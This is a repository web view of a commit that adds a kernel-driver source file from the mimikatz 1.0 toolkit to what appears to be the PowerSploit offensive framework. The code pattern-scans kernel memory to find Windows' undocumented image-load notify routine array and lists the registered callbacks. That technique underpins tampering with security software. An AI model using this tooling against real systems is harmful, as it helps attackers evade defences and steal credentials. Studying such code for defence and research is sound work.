aboutsummaryrefslogtreecommitdiff
path: root/Exfiltration/mimikatz-1.0/driver/notify_image.c
diff options
context:
space:
mode:
authorclymb3r <bialek.joseph@gmail.com>2013-10-01 09:47:05 -0700
committerclymb3r <bialek.joseph@gmail.com>2013-10-01 09:47:05 -0700
commit59cd18360764af6e6133ad11ec9cd8295372e587 (patch)
tree758a4f12cd6d2bddb0006df7d1fcac3736b61b8f /Exfiltration/mimikatz-1.0/driver/notify_image.c
parentb17272eb98933c62baa5a21bcd23713f9182ee38 (diff)
downloadPowerSploit-59cd18360764af6e6133ad11ec9cd8295372e587.tar.gz
PowerSploit-59cd18360764af6e6133ad11ec9cd8295372e587.zip
Adding Invoke-Mimikatz and Invoke-Ninjacopy
Diffstat (limited to 'Exfiltration/mimikatz-1.0/driver/notify_image.c')
-rw-r--r--Exfiltration/mimikatz-1.0/driver/notify_image.c117
1 files changed, 117 insertions, 0 deletions
diff --git a/Exfiltration/mimikatz-1.0/driver/notify_image.c b/Exfiltration/mimikatz-1.0/driver/notify_image.c
new file mode 100644
index 0000000..6f03fd4
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/driver/notify_image.c
@@ -0,0 +1,117 @@
+#include "notify_image.h"
+
+ULONG * PspLoadImageNotifyRoutineCount = NULL;
+PVOID * PspLoadImageNotifyRoutine = NULL;
+
+NTSTATUS kListNotifyImages(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining)
+{
+ NTSTATUS status;
+ ULONG i;
+ PKIWI_CALLBACK monCallBack;
+
+ *ppszDestEnd = pszDest; *pcbRemaining= cbDest;
+ status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"kListNotifyImages\n\n");
+ if(NT_SUCCESS(status))
+ {
+ status = getPspLoadImageNotifyRoutine();
+ if(NT_SUCCESS(status))
+ {
+ for(i = 0; (i < *PspLoadImageNotifyRoutineCount) && NT_SUCCESS(status); i++)
+ {
+ monCallBack = (PKIWI_CALLBACK) KIWI_mask3bits(PspLoadImageNotifyRoutine[i]);
+ if(monCallBack != NULL)
+ {
+ status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%.2u] ", i);
+ if(NT_SUCCESS(status))
+ {
+ status = getModuleFromAddr((ULONG_PTR) monCallBack->callback, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining);
+ if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND)
+ {
+ status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\n");
+ }
+ }
+ }
+ }
+ }
+ }
+ return status;
+}
+
+NTSTATUS getPspLoadImageNotifyRoutine()
+{
+ NTSTATUS retour = STATUS_NOT_FOUND;
+ #ifdef _M_X64
+ UCHAR PTRN_WNT5_Image[] = {0x48, 0x8d, 0x35};
+ LONG OFFS_WNT5_Image = sizeof(PTRN_WNT5_Image);
+ UCHAR PTRN_WNT6_Image[] = {0x48, 0x8d, 0x0d};
+ LONG OFFS_WNT6_Image = sizeof(PTRN_WNT6_Image);
+
+ LONG OFFS_WNT5_Count = - 0x0c;
+ LONG OFFS_WNT6_Count = sizeof(PVOID) * MAX_NT_PspLoadImageNotifyRoutine;
+ #elif defined _M_IX86
+ UCHAR PTRN_WNT5_Image[] = {0x6a, 0x00, 0x53, 0x56};
+ UCHAR PTRN_WNO8_Image[] = {0x6a, 0x00, 0x8b, 0xcb, 0x8b, 0xc6};
+ UCHAR PTRN_WIN8_Image[] = {0x33, 0xff, 0x6a, 0x00, 0x53, 0x8b, 0xc6};
+ LONG OFFS_WALL_Image = -(LONG) sizeof(PVOID);
+
+ LONG OFFS_WNT5_Count = - 0x18;
+ LONG OFFS_WNO8_Count = sizeof(PVOID) * MAX_NT_PspLoadImageNotifyRoutine;
+ LONG OFFS_WIN8_Count = - 0x20;
+ #endif
+
+ PUCHAR pointeur = NULL, pattern = NULL, refDebut = (PUCHAR) PsSetLoadImageNotifyRoutine, refFin = refDebut + PAGE_SIZE; SIZE_T taille = 0; LONG offsetTo = 0;
+ LONG offsetToCountEx = 0, offsetToCount = 0;
+
+ if(PspLoadImageNotifyRoutine && PspLoadImageNotifyRoutineCount)
+ {
+ retour = STATUS_SUCCESS;
+ }
+ else
+ {
+ if(INDEX_OS < INDEX_VISTA)
+ {
+ pattern = PTRN_WNT5_Image;
+ taille = sizeof(PTRN_WNT5_Image);
+ #ifdef _M_X64
+ offsetTo = OFFS_WNT5_Image;
+ #endif
+ offsetToCount = OFFS_WNT5_Count;
+ }
+ else
+ {
+ #ifdef _M_X64
+ pattern = PTRN_WNT6_Image;
+ taille = sizeof(PTRN_WNT6_Image);
+ offsetTo = OFFS_WNT6_Image;
+ offsetToCount = OFFS_WNT6_Count;
+ #elif defined _M_IX86
+ if(INDEX_OS < INDEX_8)
+ {
+ pattern = PTRN_WNO8_Image;
+ taille = sizeof(PTRN_WNO8_Image);
+ offsetToCount = OFFS_WNO8_Count;
+ }
+ else
+ {
+ pattern = PTRN_WIN8_Image;
+ taille = sizeof(PTRN_WIN8_Image);
+ offsetToCount = OFFS_WIN8_Count;
+ }
+ #endif
+ }
+ #ifdef _M_IX86
+ offsetTo = OFFS_WALL_Image;
+ #endif
+
+ retour = genericPointerSearch(&pointeur, refDebut, refFin, pattern, taille, offsetTo);
+ if(NT_SUCCESS(retour))
+ {
+ PspLoadImageNotifyRoutine = (PVOID) (pointeur);
+ PspLoadImageNotifyRoutineCount = (PULONG) (pointeur + offsetToCount);
+
+ if(PspLoadImageNotifyRoutine && PspLoadImageNotifyRoutineCount)
+ retour = STATUS_SUCCESS;
+ }
+ }
+ return retour;
+}
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-28 21:44:05 +0000